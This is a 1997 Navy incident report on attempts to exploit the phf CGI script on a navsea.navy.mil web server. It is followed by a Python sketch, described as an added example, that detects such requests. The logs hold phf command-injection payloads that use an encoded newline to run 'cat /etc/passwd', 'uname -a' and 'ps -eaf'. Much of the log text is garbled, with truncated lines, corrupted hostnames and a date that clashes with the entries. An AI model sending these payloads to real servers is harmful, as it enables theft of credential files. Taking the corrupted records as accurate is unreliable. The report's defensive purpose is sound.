Report Date: 30 April 1997

Name: B 

Command: Indian Head MD

Phone (COMM): 301-743-6474

E-Mail: navsea.navy.mil/ webmaster@www.navsea.navy.mil 

Type: Intrusion Attempts 

Victim IP: www.navsea.navy.mil (aka navsea.navy.mil) 144.11.10.110

Port/Service: phf

Incident Date: 3 Dec 97 to 30 Apr 97 
NCIS Case #: 

Case Status: 

Notes: After receiving a NAVCIRT Advisory on cgi-bin vulnerabilities, command checked their audit logs for traces of attempts to exploit the vulnerabilities identified. The command found 24 attempts to get the password file from 18 separate IP addresses dating between 3 December through 30 April 1997.


Logs follow: 


404 0 

23/12/1 HTTP/1.0 
404 166 


a HTTP/1. 


404 145 


[03/Dec/1996:17:56:HEAD /cgi-bin/WebQuery HTTP 
[18/Dec/1996:08:02:GET /cgi-bin/net.Thread.pi/

i 

[24/Dec/1996:08:40:GET /cgi-bin/sites.pl?-alph 
[24/Dec/1996:08:40:GET /cgi-bin/rsitea.pl?-alp 


404 146 

md59-099.compuserve.com [25/Dec/1996:05:23:GET /cgi-bin/wais-text-multi? HTTP/1.0

ppp85.tsl.enterprise.ca [06/Jan/1997:21:56:GET /cgi-bin/phf?Qalias=X%0Acat%20/etc/passwdcgi-bin/phf? HTTP/1.0

ppp85.tsl.enterprise.ca [06/Jan/1997:21:56:GET /cgi-bin/phf?Qalias=X%0Acat%20/etc/passwd HTTP/1.0
200 88 

head682.dt.navy.mil [09/Jan/1997:16:21:GET /cgi-bin/rphone.pl HTTP/1.0

404 146

head682.dt.navy.mil [09/Jan/1997:16:42:GET /cgi-bin/rphone.pl HTTP/1.0

404 146

head682.dt.navy.mil [09/Jan/1997:16:49:GET /cgi-bin/rphone.pl HTTP/1.0

404 146 

[13/Jan/1997:15:40:GET /cgi-bin/ilpcnew.sh?first= HTTP/1.0

404 147 

atrocious.dialin.utoront [19/Jan/1997:08:09:GET /cgi-bin/wais-text-multi? HTTP/1.0

404 -4 

mcipmcfw.pmc.lirtB^^ com [23/Jan/1997:14:35:GET /cgi-bin/pursuit?query=atlantic+systems+group+turnstyle&matchmode=or&minscore=.1&maxhits=40&terse=terse

404 -4 

www4.worldtel.net [26/Jan/1997:15:30:GET /cgi-bin/phf/?Qalias=x%ff/bin/cat%20/etc/passwd
200 92 

4HH|p.vianet.net.au [28/Jan/1997:09:29:GET /cgi-bin/phf/?Qalias=x%0a/bin/cat%20/etc/passwd
200 93

HHHBV [21/Feb/1997:13:15:GET /cgi-bin/phf?Q=x%0auname+-a

200 76 

[11/Mar/1997:21:10:GET /cgi HTTP/1.0 

404 132 

nnsdc-bh.cc.nns.com [01/Apr/1997:10:53:GET /cgi-bin/pursuit?query=NORFOLK%20NAVAL%20YARD HTTP/1.0
404 144 

[10/Apr/1997:14:06:GET /cgi-bin/ilpcnew.sh?fir




404 147 

.CompuServe. [12/Apr/1997:21:37:GET /cgi-bin/phf?Qalias=x%0
n/cat%20/etc/passwd HTTP/1.0
200 93 

pppl.eagle.ovik.se [15/Apr/1997:08:11:GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0
200 93 

ppp63.cityline.ru [30/Apr/1997:10:58:GET /cgi-bin/phf?Q=x%0auname%20-a

404 139

ppp63.cityline.ru [30/Apr/1997:10:58:GET /cgi-bin/phf?Q=x%0aps%20-eaf

404 139

ppp63.cityline.ru [30/Apr/1997:10:58:GET /cgi-bin/phf?Q=x%0acat%20/etc/passwd

404 139
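
The log review described in the notes, sketched as an added example (not part of the original report): it flags requests to /cgi-bin/phf whose query string decodes to a line break, then counts attempts, distinct sources, and requests answered with status 200. It assumes complete Common Log Format lines; the sample lines and hostnames are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Common Log Format: host ident user [time] "METHOD target PROTO" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)$')

def phf_attempts(lines):
    """Return (host, time, decoded_query, status) for each phf request whose
    query string carries an encoded line break (%0a / %0d, any case)."""
    hits = []
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue  # unparseable line: skip it rather than guess
        host, when, _method, target, status, _size = m.groups()
        parts = urlsplit(target)
        # Accept /cgi-bin/phf and /cgi-bin/phf/ (both forms occur in the report's logs)
        if unquote(parts.path).lower().rstrip("/") != "/cgi-bin/phf":
            continue
        query = unquote(parts.query)
        if "\n" in query or "\r" in query:
            hits.append((host, when, query, int(status)))
    return hits

def summarize(hits):
    """Counts of the kind the notes give, plus the requests the server answered 200."""
    return {
        "attempts": len(hits),
        "sources": len({h[0] for h in hits}),
        "served_200": [h for h in hits if h[3] == 200],
    }

# Constructed sample lines; hostnames are placeholders, not taken from the report
SAMPLE = [
    'dialup1.example.net - - [06/Jan/1997:21:56:10 -0500] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 93',
    'dialup1.example.net - - [06/Jan/1997:21:56:40 -0500] "GET /cgi-bin/phf/?Qalias=x%0A/bin/cat%20/etc/passwd HTTP/1.0" 200 92',
    'dialup2.example.org - - [30/Apr/1997:10:58:02 -0400] "GET /cgi-bin/phf?Q=x%0auname%20-a HTTP/1.0" 404 139',
    'intranet.example.com - - [09/Jan/1997:16:21:33 -0500] "GET /cgi-bin/rphone.pl HTTP/1.0" 404 146',
    'search.example.com - - [01/Apr/1997:10:53:00 -0500] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    report = summarize(phf_attempts(SAMPLE))
    print(report["attempts"], "attempts from", report["sources"], "sources")
    for host, when, query, status in report["served_200"]:
        print("served:", host, when, repr(query), status)
```

A 200 response only shows that the script ran; whether a password file was returned has to be judged from the response size and the host's own records.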